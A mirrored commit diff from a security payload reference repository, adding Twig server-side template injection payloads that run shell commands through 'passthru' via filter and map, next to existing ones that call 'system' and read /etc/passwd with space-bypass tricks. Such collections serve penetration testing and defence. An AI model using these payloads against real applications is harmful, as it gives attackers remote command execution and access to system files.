mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Added 'passthru' filter exploits
This commit is contained in:
parent
1e66a42bba
commit
c1dc141e13
@ -966,6 +966,8 @@ $output = $twig > render (
|
||||
{{['id',1]|sort('system')|join}}
|
||||
{{['cat\x20/etc/passwd']|filter('system')}}
|
||||
{{['cat$IFS/etc/passwd']|filter('system')}}
|
||||
{{['id']|filter('passthru')}}
|
||||
{{['id']|map('passthru')}}
|
||||
```
|
||||
|
||||
Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)
|
||||
|
Loading…
Reference in New Issue
Block a user